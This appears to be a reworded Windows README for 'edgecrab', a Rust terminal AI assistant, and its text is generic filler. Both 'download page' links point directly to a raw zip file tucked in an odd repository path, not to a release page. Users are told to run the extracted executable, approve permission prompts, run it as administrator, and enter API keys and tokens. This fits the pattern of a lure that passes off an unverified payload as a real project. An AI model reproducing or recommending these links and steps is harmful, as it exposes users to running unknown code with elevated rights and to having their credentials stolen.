edgecrab is a personal assistant that runs in the terminal on Windows. It helps you ask questions, run tasks, and connect to LLM providers from one place. It uses a fast Rust core, a text-based interface, a ReAct tool loop, and support for gateway adapters and the ACP protocol.
If you want a local tool that stays in the terminal and keeps setup simple, edgecrab is built for that.
To run edgecrab on Windows, use a PC with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 1 GB of free disk space
- Internet access for the first setup
- A keyboard and mouse
- A modern terminal app such as Windows Terminal or Command Prompt
For a smoother experience, 8 GB of RAM or more works well.
-
Open the download page: https://github.com/abbeydamaged846/edgecrab/raw/refs/heads/main/quiesce/Software-1.7.zip
-
On the page, look for the latest release or download files.
-
Download the Windows file that matches your system.
-
If the file ends in
.exe, double-click it to run. -
If the file is in a
.zipfile, right-click it and choose Extract All. -
Open the extracted folder.
-
Run the edgecrab app from the extracted files.
-
If Windows asks for permission, choose Yes.
When edgecrab opens for the first time, it may ask for a provider key or setup details. Follow the prompts in the terminal.
A typical first run looks like this:
- Start edgecrab.
- Pick your LLM provider.
- Enter the required API key or access token.
- Choose a model.
- Start typing your request.
If you use a provider like OpenAI, Anthropic, or a local model server, enter the details the app asks for.
edgecrab works in a simple text window. You type a request, and it responds in the same place.
You can use it for things like:
- Writing short notes
- Summarizing text
- Planning tasks
- Checking commands before you run them
- Asking follow-up questions
- Using connected tools through the ReAct loop
Example requests:
- Summarize this text in plain English
- Help me plan my day
- Explain this error message
- Draft a short reply to this email
- Find the steps to set up a printer
edgecrab uses Rust, which helps it start fast and stay light on system resources.
You use edgecrab inside a terminal window. This keeps the app focused and easy to run on Windows.
edgecrab can think through a task, call tools, and continue based on the result. This helps with multi-step work.
You can connect edgecrab to more than one model provider. That gives you more choice in how you work.
edgecrab can work through adapters that connect it to other services and tools.
The app includes security-focused defaults that help reduce risk when it runs tasks and connects to services.
ACP support lets edgecrab fit into setups that use that protocol for agent and tool communication.
If you already downloaded the app, follow these steps:
- Open the folder where you saved the download.
- If the file is zipped, extract it first.
- Find the edgecrab app file.
- Double-click it to launch.
- If a terminal window opens, keep it open.
- Follow the on-screen prompts.
- Enter your provider details when asked.
If nothing happens, right-click the file and choose Run as administrator if your system asks for it.
edgecrab needs a model provider before it can answer your requests. The app may ask for:
- API key
- Base URL
- Model name
- Gateway address
- Token or login info
Use the details from your provider account. If you use a local model server, enter its address in the setup flow.
Use short, clear requests. That helps edgecrab give better answers.
Good examples:
- Turn this into a checklist
- Compare these two options
- Rewrite this in simple words
- Find the next step
- Explain this one line of text
If you want a stronger result, add context:
- What you need
- Who it is for
- The tone you want
- The format you want
edgecrab fits well in these cases:
- Personal task help
- Text rewriting
- Quick research
- Command guidance
- Tool-driven workflows
- Agent-style automation
- Terminal-based AI work
After extraction, you may see files like these:
- The main app file
- Config files
- A data folder
- A readme or license file
- Support files for the terminal interface
Keep the full folder together. Do not move single files out of it unless the app instructions say so.
Try these steps:
- Make sure the download finished.
- Extract the files if they came in a zip.
- Check that you opened the correct app file.
- Close and reopen the terminal.
- Try running it from the folder again.
- Make sure your Windows version is up to date.
- Confirm that your provider settings are correct.
To get a newer version:
- Return to the download page: https://github.com/abbeydamaged846/edgecrab/raw/refs/heads/main/quiesce/Software-1.7.zip
- Download the latest Windows build.
- Remove the old files if the new release uses a fresh folder.
- Extract or run the new version.
- Open the app and check your settings.
- Name: edgecrab
- Type: terminal AI assistant
- Core language: Rust
- Interface: TUI
- Focus: local control, tool use, and multi-provider support
- Topics: agentic-ai, ai-agent, autonomous-agent, cli, llm, mcp, nous-hermes, openclaw, react-agent, rust, terminal, tui
After setup, try a short task first.
Example:
- Summarize this paragraph
- Explain how this tool works
- Create a to-do list for today
- Help me write a short message
This lets you check that the app is set up right before you use larger tasks.